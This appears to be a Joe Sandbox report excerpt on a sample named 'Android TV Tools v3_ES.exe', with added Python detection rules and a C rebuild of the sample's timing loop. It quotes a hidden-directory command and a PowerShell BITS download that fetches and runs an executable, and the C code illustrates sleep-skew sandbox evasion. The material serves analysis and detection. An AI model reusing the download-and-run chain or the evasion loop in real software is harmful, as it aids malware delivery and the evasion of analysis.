                      Commandline:ping google.com -n 1
                      Imagebase:0x760000
                      File size:18'944 bytes
                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:11
                      Start time:14:58:55
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'"
                      Imagebase:0xa80000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:14:58:56
                      Start date:25/05/2024
                      Path:C:\Windows\System32\svchost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Imagebase:0x7ff7e52b0000
                      File size:55'320 bytes
                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:14
                      Start time:14:59:05
                      Start date:25/05/2024
                      Path:C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe
                      Wow64 process (32bit):true
                      Commandline:"Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999
                      Imagebase:0x400000
                      File size:27'136 bytes
                      MD5 hash:34348DD557468D401AE4BFAE2E850EEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true
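Read in order, the process list above is a procedure: the sample creates a hidden working directory under %TEMP%, runs a dropped batch file, pings google.com once, downloads cmdmax-x86.exe from GitHub through BITS, and then executes the downloaded binary. As an added example that is not part of the report, the Python below parses the report's "Key:Value" process blocks and applies the rules a detection engineer would write for that chain. SAMPLE_PROCESSES keeps only the Target ID, Path and Commandline fields of a subset of the entries above; the rule names and the parse_processes/triage helpers are this example's own.

```python
"""Triage rules over the process list of this sandbox report.

Added example, not part of the Joe Sandbox report or of the analysed sample.
SAMPLE_PROCESSES is a condensed copy of 'Target ID' entries shown on the page
(only ID, Path and Commandline kept); rule names and helpers are this example's.
"""
import re
from typing import Dict, List

SAMPLE_PROCESSES = r"""
Target ID:0
Path:C:\Users\user\Desktop\Android TV Tools v3_ES.exe
Commandline:"C:\Users\user\Desktop\Android TV Tools v3_ES.exe"

Target ID:4
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp

Target ID:5
Path:C:\Windows\SysWOW64\attrib.exe
Commandline:attrib +h C:\Users\user\AppData\Local\Temp\ytmp

Target ID:9
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"

Target ID:10
Path:C:\Windows\SysWOW64\PING.EXE
Commandline:ping google.com -n 1

Target ID:11
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'"

Target ID:14
Path:C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe
Commandline:"Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999
"""

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
BITS_XFER = re.compile(
    r"Start-BitsTransfer\s+-Source\s+(\S+)\s+-Destination\s+'?([^'\"]+)'?", re.I)


def parse_processes(text: str) -> List[Dict[str, str]]:
    """Split the report's blank-line separated 'Key:Value' blocks into dicts."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")  # split on the first colon only
            entry[key.strip()] = value.strip()
        if "Target ID" in entry:
            procs.append(entry)
    return procs


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(text: str) -> List[Dict[str, str]]:
    """Return one finding per process that matches a rule, in process order."""
    findings = []
    downloaded = {}  # basename of a BITS -Destination -> source URL

    for proc in parse_processes(text):
        pid = proc["Target ID"]
        exe = basename(proc.get("Path", ""))
        cmd = proc.get("Commandline", "")

        def hit(rule: str, detail: str, pid=pid) -> None:
            findings.append({"id": pid, "rule": rule, "detail": detail})

        if exe == "powershell.exe" and (m := BITS_XFER.search(cmd)):
            src, dst = m.group(1), m.group(2).strip()
            downloaded[basename(dst)] = src
            hit("powershell_bits_download", f"{src} -> {dst}")
        elif exe == "ping.exe" and (m := re.search(r"-n\s+(\d+)", cmd, re.I)):
            # A one-shot ping from a batch file doubles as a sleep and a connectivity probe.
            if int(m.group(1)) <= 5:
                hit("ping_probe_or_sleep", cmd)
        elif exe == "attrib.exe" and re.search(r"\+h\b", cmd, re.I) and TEMP_DIR.search(cmd):
            hit("hidden_temp_directory", cmd)
        elif exe == "cmd.exe" and re.search(r"\\Temp\\[^\"]*\.bat\b", cmd, re.I) \
                and not re.search(r"\bdel\b", cmd, re.I):
            hit("temp_batch_executed", cmd)
        # Anything whose image name equals an earlier BITS destination is a
        # downloaded payload being launched.
        if exe in downloaded:
            hit("downloaded_binary_executed", f"{proc['Path']} (from {downloaded[exe]})")
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_PROCESSES):
        print(f"[{f['id']:>2}] {f['rule']:<28} {f['detail']}")
```

The ordering matters: the BITS rule records the destination file name so that the later execution of cmdmax.exe (Target ID 14) is tied back to the URL it came from, which is the link an analyst needs when deciding whether the fetched file is the benign open-source cmdmax or something swapped in. On a live host the same rules apply to Sysmon Event ID 1 or Security 4688 process-creation records in place of the report's blocks.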


                        Execution Graph

                        Execution Coverage:21.7%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:2.6%
                        Total number of Nodes:1368
                        Total number of Limit Nodes:25
                        execution_graph 7497 40a740 7498 40a747 7497->7498 7499 40a74f MultiByteToWideChar 7498->7499 7500 40a778 7498->7500 7499->7500 7501 40a768 GetStringTypeW 7499->7501 7501->7500 6492 406444 GetVersion 6513 40893c HeapCreate 6492->6513 6494 4064a2 6495 4064a7 6494->6495 6496 4064af 6494->6496 6628 406548 6495->6628 6520 4075bc 6496->6520 6500 4064b8 GetCommandLineA 6534 40880a 6500->6534 6504 4064d2 6566 408504 6504->6566 6506 4064d7 6579 401000 6506->6579 6514 408971 6513->6514 6515 40895c 6513->6515 6514->6494 6641 409815 HeapAlloc 6515->6641 6518 408974 6518->6494 6519 408965 HeapDestroy 6519->6514 6643 408da8 6520->6643 6523 4075db GetStartupInfoA 6526 407627 6523->6526 6527 4076ec 6523->6527 6526->6527 6530 408da8 6 API calls 6526->6530 6533 407698 6526->6533 6528 407753 SetHandleCount 6527->6528 6529 407713 GetStdHandle 6527->6529 6528->6500 6529->6527 6531 407721 GetFileType 6529->6531 6530->6526 6531->6527 6532 4076ba GetFileType 6532->6533 6533->6527 6533->6532 6535 408825 GetEnvironmentStringsW 6534->6535 6536 408858 6534->6536 6537 40882d 6535->6537 6539 408839 GetEnvironmentStrings 6535->6539 6536->6537 6538 408849 6536->6538 6541 408871 WideCharToMultiByte 6537->6541 6542 408865 GetEnvironmentStringsW 6537->6542 6540 4064c8 6538->6540 6543 4088f7 6538->6543 6544 4088eb GetEnvironmentStrings 6538->6544 6539->6538 6539->6540 6557 4085bd 6540->6557 6546 4088a5 6541->6546 6547 4088d7 FreeEnvironmentStringsW 6541->6547 6542->6540 6542->6541 6548 408da8 6 API calls 6543->6548 6544->6540 6544->6543 6549 408da8 6 API calls 6546->6549 6547->6540 6555 408912 6548->6555 6550 4088ab 6549->6550 6550->6547 6551 4088b4 WideCharToMultiByte 6550->6551 6553 4088ce 6551->6553 6554 4088c5 6551->6554 6552 408928 FreeEnvironmentStringsA 6552->6540 6553->6547 6701 407308 6554->6701 6555->6552 6558 4085d4 GetModuleFileNameA 6557->6558 6559 4085cf 6557->6559 6561 4085f7 6558->6561 6714 40b625 6559->6714 6562 408da8 6 API calls 6561->6562 6563 408618 
6562->6563 6564 408628 6563->6564 6565 406523 7 API calls 6563->6565 6564->6504 6565->6564 6567 408511 6566->6567 6569 408516 6566->6569 6568 40b625 19 API calls 6567->6568 6568->6569 6570 408da8 6 API calls 6569->6570 6571 408543 6570->6571 6572 406523 7 API calls 6571->6572 6576 408557 6571->6576 6572->6576 6573 40859a 6574 407308 4 API calls 6573->6574 6575 4085a6 6574->6575 6575->6506 6576->6573 6577 408da8 6 API calls 6576->6577 6578 406523 7 API calls 6576->6578 6577->6576 6578->6576 6580 40100d 6579->6580 6768 404d37 6580->6768 6582 401218 GetStdHandle GetModuleFileNameA 6583 40125a 6582->6583 6584 401448 GetTempPathA 6583->6584 6585 401472 6584->6585 6775 40563f 6585->6775 6587 4014e4 6780 4055a9 6587->6780 6589 4015ab 6590 40563f 13 API calls 6589->6590 6591 4015ee 6590->6591 6592 4055a9 52 API calls 6591->6592 6593 4016b5 6592->6593 6594 40563f 13 API calls 6593->6594 6595 4016d3 6594->6595 6596 4055a9 52 API calls 6595->6596 6597 4016e2 6596->6597 6790 403217 6597->6790 6599 4016f1 6600 40563f 13 API calls 6599->6600 6601 40170e 6600->6601 6602 403217 16 API calls 6601->6602 6603 401743 6602->6603 6604 40563f 13 API calls 6603->6604 6605 401758 6604->6605 6606 40563f 13 API calls 6605->6606 6607 40177b 6606->6607 6608 40563f 13 API calls 6607->6608 6609 4019bd 6608->6609 6610 40563f 13 API calls 6609->6610 6611 4019dd 6610->6611 6612 40563f 13 API calls 6611->6612 6613 401b5f 6612->6613 6614 40563f 13 API calls 6613->6614 6615 401ba4 6614->6615 6616 40563f 13 API calls 6615->6616 6617 401be1 6616->6617 6618 40563f 13 API calls 6617->6618 6619 401e35 6618->6619 6796 401ef5 6619->6796 6621 401e3d 6622 4055a9 52 API calls 6621->6622 6623 401e47 6622->6623 6625 4055a9 52 API calls 6623->6625 6627 401ea0 6623->6627 6624 401eeb 6634 405db9 6624->6634 6625->6623 6626 4055a9 52 API calls 6626->6627 6627->6624 6627->6626 6629 406551 6628->6629 6630 406556 6628->6630 6632 408b48 7 API calls 6629->6632 6631 408b81 7 API calls 6630->6631 6633 40655f ExitProcess 
6631->6633 6632->6630 6635 405ddb 3 API calls 6634->6635 6636 405dc6 6635->6636 6637 408380 6636->6637 6638 40838c 6637->6638 6639 4084b5 UnhandledExceptionFilter 6638->6639 6640 406515 6638->6640 6639->6640 6642 408961 6641->6642 6642->6518 6642->6519 6652 408dba 6643->6652 6646 406523 6647 406531 6646->6647 6648 40652c 6646->6648 6687 408b81 6647->6687 6681 408b48 6648->6681 6653 4075cd 6652->6653 6655 408dc1 6652->6655 6653->6523 6653->6646 6655->6653 6656 408de6 6655->6656 6657 408df3 6656->6657 6658 408df9 6656->6658 6662 409ba9 6657->6662 6660 408e05 RtlAllocateHeap 6658->6660 6661 408e1a 6658->6661 6660->6661 6661->6655 6667 409bdb 6662->6667 6663 409c83 6677 409f63 6663->6677 6665 409c97 6665->6658 6667->6663 6667->6665 6670 409eb2 6667->6670 6671 409ef5 HeapAlloc 6670->6671 6672 409ec5 HeapReAlloc 6670->6672 6674 409c7a 6671->6674 6675 409f1b VirtualAlloc 6671->6675 6673 409ee4 6672->6673 6672->6674 6673->6671 6674->6663 6674->6665 6675->6674 6676 409f35 HeapFree 6675->6676 6676->6674 6678 409f75 VirtualAlloc 6677->6678 6680 409c89 6678->6680 6680->6665 6683 408b52 6681->6683 6682 408b7f 6682->6647 6683->6682 6684 408b81 7 API calls 6683->6684 6685 408b69 6684->6685 6686 408b81 7 API calls 6685->6686 6686->6682 6688 408b94 6687->6688 6689 408cab 6688->6689 6690 408bd4 6688->6690 6695 40653a 6688->6695 6691 408cbe GetStdHandle WriteFile 6689->6691 6692 408be0 GetModuleFileNameA 6690->6692 6690->6695 6691->6695 6693 408bf8 6692->6693 6696 40b641 6693->6696 6695->6523 6697 40b64e LoadLibraryA 6696->6697 6698 40b690 6696->6698 6697->6698 6699 40b65f GetProcAddress 6697->6699 6698->6695 6699->6698 6700 40b676 GetProcAddress GetProcAddress 6699->6700 6700->6698 6702 407311 6701->6702 6703 407335 6701->6703 6704 407327 HeapFree 6702->6704 6705 40731d 6702->6705 6703->6553 6704->6703 6708 40987e 6705->6708 6707 407323 6707->6553 6709 4098c5 6708->6709 6710 409ab7 VirtualFree 6709->6710 6713 409b71 6709->6713 6711 409b1b 6710->6711 6712 409b2a VirtualFree HeapFree 
6711->6712 6711->6713 6712->6713 6713->6707 6715 40b62e 6714->6715 6717 40b635 6714->6717 6718 40b261 6715->6718 6717->6558 6725 40b3fa 6718->6725 6722 40b2a4 GetCPInfo 6724 40b2b8 6722->6724 6723 40b3ee 6723->6717 6724->6723 6730 40b4a0 GetCPInfo 6724->6730 6726 40b41a 6725->6726 6727 40b40a GetOEMCP 6725->6727 6728 40b272 6726->6728 6729 40b41f GetACP 6726->6729 6727->6726 6728->6722 6728->6723 6728->6724 6729->6728 6731 40b58b 6730->6731 6734 40b4c3 6730->6734 6731->6723 6738 40a643 6734->6738 6737 40be20 9 API calls 6737->6731 6739 40a68c 6738->6739 6740 40a674 GetStringTypeW 6738->6740 6741 40a6b7 GetStringTypeA 6739->6741 6742 40a6db 6739->6742 6740->6739 6743 40a690 GetStringTypeA 6740->6743 6745 40a778 6741->6745 6742->6745 6746 40a6f1 MultiByteToWideChar 6742->6746 6743->6739 6743->6745 6750 40be20 6745->6750 6746->6745 6747 40a715 6746->6747 6747->6745 6748 40a74f MultiByteToWideChar 6747->6748 6748->6745 6749 40a768 GetStringTypeW 6748->6749 6749->6745 6751 40be50 LCMapStringW 6750->6751 6752 40be6c 6750->6752 6751->6752 6753 40be74 LCMapStringA 6751->6753 6755 40bed2 6752->6755 6756 40beb5 LCMapStringA 6752->6756 6753->6752 6754 40b563 6753->6754 6754->6737 6755->6754 6757 40bee8 MultiByteToWideChar 6755->6757 6756->6754 6757->6754 6758 40bf12 6757->6758 6758->6754 6759 40bf48 MultiByteToWideChar 6758->6759 6759->6754 6760 40bf61 LCMapStringW 6759->6760 6760->6754 6761 40bf7c 6760->6761 6762 40bfc2 6761->6762 6763 40bf82 6761->6763 6762->6754 6765 40bffa LCMapStringW 6762->6765 6763->6754 6764 40bf90 LCMapStringW 6763->6764 6764->6754 6765->6754 6766 40c012 WideCharToMultiByte 6765->6766 6766->6754 6769 404d7a 6768->6769 6770 405528 timeGetTime 6769->6770 6771 405537 6770->6771 6772 405571 Sleep 6771->6772 6773 40558f timeGetTime 6772->6773 6774 40559e 6773->6774 6774->6582 6948 40692a 6775->6948 6778 405677 6778->6587 6987 4068ad 6780->6987 6783 4055c7 6785 4055cb 6783->6785 7012 406869 GetFileAttributesA 6783->7012 6784 4055df 6786 4055fc 6784->6786 
6993 4066cf 6784->6993 6785->6589 6786->6785 7015 40656c 6786->7015 6791 40322a 6790->6791 7160 4036d1 timeGetTime 6791->7160 6793 403237 7165 4035ee 6793->7165 6795 40324b 6795->6599 6797 4020e8 6796->6797 6798 40563f 13 API calls 6797->6798 6799 402106 6798->6799 7168 403559 GetModuleFileNameA 6799->7168 6801 402115 7169 405edf 6801->7169 6804 402149 7172 405d00 6804->7172 6809 405db9 3 API calls 6809->6804 6814 405d00 6 API calls 6815 4021a2 6814->6815 7194 405ac6 6815->7194 6817 4021ba 7198 4032a3 6817->7198 6819 4021d9 6820 405d00 6 API calls 6819->6820 6821 40220a 6820->6821 6822 405ac6 12 API calls 6821->6822 6823 402222 6822->6823 6824 4032a3 6 API calls 6823->6824 6825 402241 6824->6825 6826 405ac6 12 API calls 6825->6826 6829 40225e 6826->6829 6828 402396 6830 4023c8 6828->6830 7222 403a1c 6828->7222 7203 403849 6829->7203 6831 405b1d 6 API calls 6830->6831 6833 4023dc 6831->6833 6834 405ac6 12 API calls 6833->6834 6835 4023fa 6834->6835 6836 405ac6 12 API calls 6835->6836 6837 402436 6836->6837 6838 402fb6 6837->6838 6840 405d00 6 API calls 6837->6840 6839 405882 13 API calls 6838->6839 6841 402fca 6839->6841 6842 4024b9 6840->6842 6841->6621 6843 405ac6 12 API calls 6842->6843 6844 4024d1 6843->6844 6845 4032a3 6 API calls 6844->6845 6846 4024f0 6845->6846 6847 405ac6 12 API calls 6846->6847 6848 40250e 6847->6848 6849 4032a3 6 API calls 6848->6849 6850 40252d 6849->6850 6852 402557 6850->6852 7276 4059ed 6850->7276 6853 405d00 6 API calls 6852->6853 6854 40260e 6853->6854 6855 405ac6 12 API calls 6854->6855 6856 40262e 6855->6856 6856->6838 6864 402b5b 6856->6864 6865 4027ce 6856->6865 7282 404caa SetConsoleCursorPosition SetConsoleCursorInfo 6856->7282 6858 4026ea 6859 405e8e 13 API calls 6858->6859 6860 4026f7 6859->6860 6861 405e8e 13 API calls 6860->6861 6862 402706 6861->6862 6863 4035ee 13 API calls 6862->6863 6866 40272c 6863->6866 6869 402d93 6864->6869 6872 40563f 13 API calls 6864->6872 6867 40563f 13 API calls 6865->6867 6868 405e8e 13 API 
calls 6866->6868 6870 402826 6867->6870 6871 402735 6868->6871 6869->6838 6878 40563f 13 API calls 6869->6878 6873 4055a9 52 API calls 6870->6873 6874 405e8e 13 API calls 6871->6874 6875 402bdc 6872->6875 6876 402835 6873->6876 6877 402742 6874->6877 6879 4055a9 52 API calls 6875->6879 6885 405edf 26 API calls 6876->6885 6880 405e8e 13 API calls 6877->6880 6881 402e14 6878->6881 6882 402beb 6879->6882 6883 40274f 6880->6883 6884 4055a9 52 API calls 6881->6884 6889 405edf 26 API calls 6882->6889 6886 4035ee 13 API calls 6883->6886 6887 402e23 6884->6887 6896 40286b 6885->6896 6888 402772 6886->6888 6891 405edf 26 API calls 6887->6891 6890 405e8e 13 API calls 6888->6890 6892 402c20 6889->6892 6893 40277b 6890->6893 6895 402e58 6891->6895 6892->6869 7207 40583f 6892->7207 6894 405e8e 13 API calls 6893->6894 6898 402788 6894->6898 6895->6838 6906 402faa 6895->6906 6907 402eae 6895->6907 6896->6864 6897 402b3d 6896->6897 6903 4059ed 12 API calls 6896->6903 6909 4028e2 6896->6909 7286 405882 6897->7286 6901 4035ee 13 API calls 6898->6901 6905 4027ab 6901->6905 6903->6909 6911 405e8e 13 API calls 6905->6911 6910 405882 13 API calls 6906->6910 6912 402ecf 6907->6912 6917 4059ed 12 API calls 6907->6917 6908 4055a9 52 API calls 6908->6864 6915 402964 6909->6915 6919 4058d8 12 API calls 6909->6919 6910->6838 6916 4027b4 6911->6916 6925 402f52 6912->6925 6928 4058d8 12 API calls 6912->6928 6913 402d87 6918 405882 13 API calls 6913->6918 6914 402c8a 6920 4059ed 12 API calls 6914->6920 6923 402cab 6914->6923 6915->6897 7283 404caa SetConsoleCursorPosition SetConsoleCursorInfo 6915->7283 6921 405e8e 13 API calls 6916->6921 6917->6912 6918->6869 6919->6915 6920->6923 6922 4027c1 6921->6922 6924 405e8e 13 API calls 6922->6924 6927 402d2e 6923->6927 6930 4058d8 12 API calls 6923->6930 6924->6865 6925->6621 6927->6621 6928->6925 6929 402a08 6931 405e8e 13 API calls 6929->6931 6930->6927 6932 402a15 6931->6932 7284 404caa SetConsoleCursorPosition SetConsoleCursorInfo 6932->7284 6934 

                        Control-flow Graph (rendered graph not recoverable): function 404d37-40553e, basic blocks 1070, 1377, 1378, 1379, 1382, 1383; a long run of alternating calls to 403575 and 4056a0/4056b0, then timeGetTime and call 40638e, followed by a loop (40555e-4055a8) of call 406398, Sleep, timeGetTime, call 40638e
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Timetime$Sleep
                        • String ID:
                        • API String ID: 4176159691-0
                        • Opcode ID: 34695182426c4961b278ce684a6b6519380ca38d5c9cabf86c5f4d6901f888cf
                        • Instruction ID: b751e6467f139353cb55b9ffbe826672e87d8d943d97ab80e4bb7b2c357d5605
                        • Opcode Fuzzy Hash: 34695182426c4961b278ce684a6b6519380ca38d5c9cabf86c5f4d6901f888cf
                        • Instruction Fuzzy Hash: E3120FE7C4020476F7106AA17C4BF9B752C5B2131EF48097EB90D751C3F97AA3684AAB

                        Control-flow Graph

                        control_flow_graph 1396 4036d1-4036f8 timeGetTime call 40638e 1399 403701-403715 1396->1399 1400 4036fa 1396->1400 1401 403718-403729 call 406398 1399->1401 1400->1399 1404 403747 1401->1404 1405 40372b-403761 Sleep timeGetTime call 40638e 1401->1405 1404->1401
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Timetime$Sleep
                        • String ID:
                        • API String ID: 4176159691-0
                        • Opcode ID: cc85ca76a26f2f31c0325530f9469c6ef665bb5aae36b1bad800a382faa1d765
                        • Instruction ID: eae6611afc9ea53c4c174798e7303799e140014dd54562b74f488a96469025fd
                        • Opcode Fuzzy Hash: cc85ca76a26f2f31c0325530f9469c6ef665bb5aae36b1bad800a382faa1d765
                        • Instruction Fuzzy Hash: FC01EDB1C00208EBDB04DF94C94579D7FB4EF0030DF20C0A9E90A6B241D735AB959B99
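The two graphs above (functions 404d37 and 4036d1) share one shape: timeGetTime, then Sleep, then timeGetTime again, in a loop that only exits once the measured wall-clock time has reached the target. That is the pattern a sleep-reduction check is built from: the sample does not trust Sleep to take as long as requested, it measures it. The C program below is an added example written for this page, not code recovered from the sample or produced by Joe Sandbox. It rebuilds that loop with the clock and delay functions injected (on Windows they would be timeGetTime and Sleep) so it compiles and runs anywhere, and it simulates a host that honours Sleep and a sandbox that skips it. The 3000 ms target and 100 ms slice are illustrative values, not constants recovered from the binary.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-ins for the Windows APIs the sample uses; injected so the loop can
   be exercised against a simulated clock. On Windows: timeGetTime (winmm,
   32-bit ms counter that wraps about every 49.7 days) and Sleep (kernel32). */
typedef uint32_t (*clock_ms_fn)(void);
typedef void     (*sleep_ms_fn)(uint32_t ms);

/* Milliseconds between two 32-bit tick readings; unsigned subtraction makes
   the result correct across the 2^32 wrap of the counter. */
static uint32_t elapsed_ms(uint32_t before, uint32_t after)
{
    return after - before;
}

/* The loop shape from the graphs: read clock, Sleep(slice), read clock,
   compare against the target, repeat until total_ms has really elapsed.
   Returns how many Sleep calls returned in less than slice_ms. */
static unsigned delay_and_measure(clock_ms_fn now, sleep_ms_fn sleep_ms,
                                  uint32_t total_ms, uint32_t slice_ms,
                                  uint32_t *out_elapsed)
{
    unsigned short_sleeps = 0;
    uint32_t start = now(), t = start;

    while (elapsed_ms(start, t) < total_ms) {
        uint32_t before = t;
        sleep_ms(slice_ms);
        t = now();
        if (elapsed_ms(before, t) < slice_ms)
            short_sleeps++;
    }
    if (out_elapsed)
        *out_elapsed = elapsed_ms(start, t);
    return short_sleeps;
}

/* Verdict used by sleep-skew checks: a Sleep that returned early means
   Sleep was patched or skipped without the clock being adjusted to match. */
static bool sleep_was_shortened(clock_ms_fn now, sleep_ms_fn sleep_ms,
                                uint32_t total_ms, uint32_t slice_ms)
{
    return delay_and_measure(now, sleep_ms, total_ms, slice_ms, NULL) > 0;
}

/* ---- simulated environments, constructed for this example -------------- */
static uint32_t sim_clock;                         /* fake ms counter */
static uint32_t sim_now(void) { return sim_clock; }

/* Honest host: Sleep(n) lets n ms pass on the clock. */
static void sim_sleep_honest(uint32_t ms) { sim_clock += ms; }

/* Sandbox that returns from Sleep at once; the clock only ticks 1 ms.
   (If it did not tick at all the loop above would never terminate, which
   is how such a sample turns sleep skipping into a busy wait.) */
static void sim_sleep_skipped(uint32_t ms) { (void)ms; sim_clock += 1; }

/* Run one 3000 ms wait in 100 ms slices from a chosen starting tick.
   The delays are illustrative values, not recovered from the sample. */
static bool run_scenario(sleep_ms_fn sleep_ms, uint32_t start_tick)
{
    sim_clock = start_tick;
    return sleep_was_shortened(sim_now, sleep_ms, 3000, 100);
}

int main(void)
{
    printf("honest Sleep:             %s\n", run_scenario(sim_sleep_honest, 0) ? "detected" : "clean");
    printf("skipped Sleep:            %s\n", run_scenario(sim_sleep_skipped, 0) ? "detected" : "clean");
    printf("honest Sleep across wrap: %s\n", run_scenario(sim_sleep_honest, 0xFFFFFF00u) ? "detected" : "clean");
    return 0;
}
```

Two consequences for a sandbox follow from the loop shape alone. Shortening Sleep while leaving the timer untouched is detected on the first slice, because the measured interval is smaller than the requested one. Shortening Sleep without ever advancing the timer is not detected, but the loop then never reaches its target and burns the analysis window as a busy wait. A sandbox that wants to accelerate such samples has to move Sleep and every clock the sample can read (timeGetTime, GetTickCount, QueryPerformanceCounter, the system time) forward consistently.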

                        Control-flow Graph

                        APIs
                        • GetVersion.KERNEL32 ref: 0040646A
                          • Part of subcall function 0040893C: HeapCreate.KERNELBASE(00000000,00001000,00000000,004064A2,00000000), ref: 0040894D
                          • Part of subcall function 0040893C: HeapDestroy.KERNEL32 ref: 0040896B
                        • GetCommandLineA.KERNEL32 ref: 004064B8
                          • Part of subcall function 00406548: ExitProcess.KERNEL32 ref: 00406565
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                        • String ID:
                        • API String ID: 1387771204-0
                        • Opcode ID: 8f64078e7c1048c80ea45f85acce868f71707771f6b24207ebeb838d2c4f3778
                        • Instruction ID: 011fcb3a6802012f724db4fd9d8ba721985a1d622206a0a919988acb22e904e2
                        • Opcode Fuzzy Hash: 8f64078e7c1048c80ea45f85acce868f71707771f6b24207ebeb838d2c4f3778
                        • Instruction Fuzzy Hash: FE11A2B1D00B01EFD708AF66DD06BB93B64EB84308F10803FF505A62E1DA7849008F6D

                        Control-flow Graph

